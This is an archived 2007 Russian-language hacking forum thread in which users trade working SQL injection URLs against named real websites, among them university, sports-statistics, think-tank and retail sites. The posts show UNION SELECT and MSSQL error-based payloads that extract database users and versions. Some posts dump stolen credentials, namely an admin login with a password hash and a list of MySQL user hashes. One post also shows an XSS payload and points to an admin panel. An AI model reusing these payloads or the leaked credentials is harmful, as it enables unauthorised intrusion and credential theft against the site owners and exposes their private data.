ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4181  
Старый 26.12.2007, 01:10
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию

Код HTML:
http://www.hranite.info/theory.php?pid=-25+UNION+SELECT+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7/*
hrman@localhost:hrani:5.0.45

Код HTML:
http://www.hranite.info/theory.php?pid=-25+UNION+SELECT+1,2,concat(username,0x3a,password,0x3a,email),4,5,6,7+FROM+users+LIMIT+0,1/*
admin:0fbd3cb40a66bda2bb951eb88e4bf460:info@hranit e.info::franzela
 
Ответить с цитированием

  #4182  
Старый 26.12.2007, 02:43
Saint-Sky
Участник форума
Регистрация: 14.07.2007
Сообщений: 108
Провел на форуме:
1888785

Репутация: 305
По умолчанию

http://www.ns.ui.edu

Код:
http://www.ns.ui.edu/mipa/wap/?view=berita&id=-1'+UNION+SELECT+1,2,convert(user()+USING+latin1),4,5,6/*
wwwns@localhost:wwwns:4.1.11
 
Ответить с цитированием

  #4183  
Старый 26.12.2007, 04:25
S1ash
Новичок
Регистрация: 19.11.2007
Сообщений: 23
Провел на форуме:
147347

Репутация: 0
По умолчанию

вот что получилось... скудненько, но всё же

Код:
http://cards.udaff.com/viewcat.php?id=-1+UNION+SELECT+database(),version(),user(),database(),version()/*
 
Ответить с цитированием

  #4184  
Старый 26.12.2007, 11:40
x88x
Участник форума
Регистрация: 27.11.2007
Сообщений: 233
Провел на форуме:
1379382

Репутация: 378
Отправить сообщение для x88x с помощью ICQ
По умолчанию

ну я тож, дабы не отставать выкладываю:

QSRWEB.COM

Код:
http://www.qsrweb.com/research.php?rc_id=16+union+select+USER(),2,3,4,5,6,7,8,9
atmmarketplace@localhost

из таблиц нашел только members...
 
Ответить с цитированием

  #4185  
Старый 26.12.2007, 15:07
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию

askort.com
Код:
http://www.askort.com/?item_id=-1+union+select+1,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),3,4/*
4.1.11:maxivanov_askort:maxivanov_askort@localhost

newuniversity.org - University of California
Код:
http://www.newuniversity.org/checkDB.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user())/*
5.37-standard-log:newunive_NewU:newunive_newu@localhost


latestchess.com - Шахматы - сила!
Код:
http://latestchess.com/showArticle.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6/*
4.0.16:lciin000_lc:lciin000_lc@localhost

vcharkarn.com - что-то индийское походу...
Код:
http://www.vcharkarn.com/include/article/showarticle.php?aid=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
5.0.22:db17937a:us17937a@localhost

Из таблиц кое-чего:
Код:
administrator
contact_list
email_confirm
exam_users_ID
member_info
В табе administrator есть поля:
Код:
admin_id,login,password
 
Ответить с цитированием

  #4186  
Старый 26.12.2007, 16:26
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию

alouettecanada.ca
Код:
http://www.alouettecanada.ca/press_releases-f.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
 
Ответить с цитированием

  #4187  
Старый 26.12.2007, 16:49
.Begemot.
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248

Репутация: 785
Отправить сообщение для .Begemot. с помощью ICQ
По умолчанию

statistik.basketball-bundesliga.de

Код HTML:
http://statistik.basketball-bundesliga.de/print_player.php?liga_id=1&team_id=413+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
Код HTML:
http://statistik.basketball-bundesliga.de/print_player.php?liga_id=1&team_id=413+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
USER:bblstats@localhost
VERSION::4.1.11-Debian_4sarge7
DATABASE:usr_web1_1

Вот тут админка еще:
Код HTML:
http://statistik.basketball-bundesliga.de/admin/
 
Ответить с цитированием

  #4188  
Старый 26.12.2007, 17:45
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

mypspwebsite.com

Цитата:
http://mypspwebsite.com/order.php?id=-5+union+select+1,2,concat(user,0x3a,password),4,5, 6,7,8,9,10,11+from+mysql.user/*
4.1.21-standard: psp :itl@localhost

root:42da70e829fb058d
itl_safeboating0:14ed81343ed8ed5b
mycms:042b624758e485a0
itl:26a3e0e614cf0724
accomm:5210de0d20737caa
lynx:32335d666b6b535d
ArthurJenkins001:6180cc7a02f27b63
licence:71801f1a6ca21bc2
tucantravel:5f42297b6482f1b4
toucan001:0dbe24ad0d0f6594

_____________________________________________
www.moriahhaggadah.com

Цитата:
http://www.moriahhaggadah.com/o rder.php?id=-258+union+select+1,2,3,4,5,concat(version(),0x3a,d atabase(),0x3a,user( )),7,8,9,10,11,12, 13,14, 15/*
5.0.32-Debian_7etch3-log:aistore:aistore@localhost
_____________________________________________
www.traditionalhousedesign.ca

Цитата:
http://www.traditionalhousedesign.ca/order.php?id=-3+union+select+1,2,concat(version(),0x3a,database( ),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16/*
5.0.45-log:housedesign:housedesign@localhost

Последний раз редактировалось ThreeD; 26.12.2007 в 20:30..
 
Ответить с цитированием

  #4189  
Старый 26.12.2007, 20:01
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

http://www.ugmk.info/?art=-1+union+select+1,2,3,4,concat_ws(0x2F,version(),da tabase(),user()),6,7,8,9/*

4.0.26-log/ugmk/ugmk@localhost


тут же XSS в поиске <script>alert()</script>

-----------------------------------------------------------------------------

http://www.uel.ru/newstext.asp?id=-1+or+1=@@version--

Microsoft SQL Server 7.00 - 7.00.1094 (Intel X86) May 29 2003 15:21:25 Copyright (c) 1988-2002 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)

http://www.uel.ru/newstext.asp?id=-1+or+1=(select+db_name())-- uel

http://www.uel.ru/newstext.asp?id=-1+or+1=(select+system_user)-- WWW\IUSR_WWW
 
Ответить с цитированием

  #4190  
Старый 26.12.2007, 21:11
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию

www.aei.brookings.org

Код HTML:
http://www.aei.brookings.org/publications/abstract.php?pid=-296+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(version(),0x3a,user(),0x3a,database()),15,16,17,18,19/*
4.0.25-standard-log:aei_brookings@10.225.135.70:aei_brookings
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ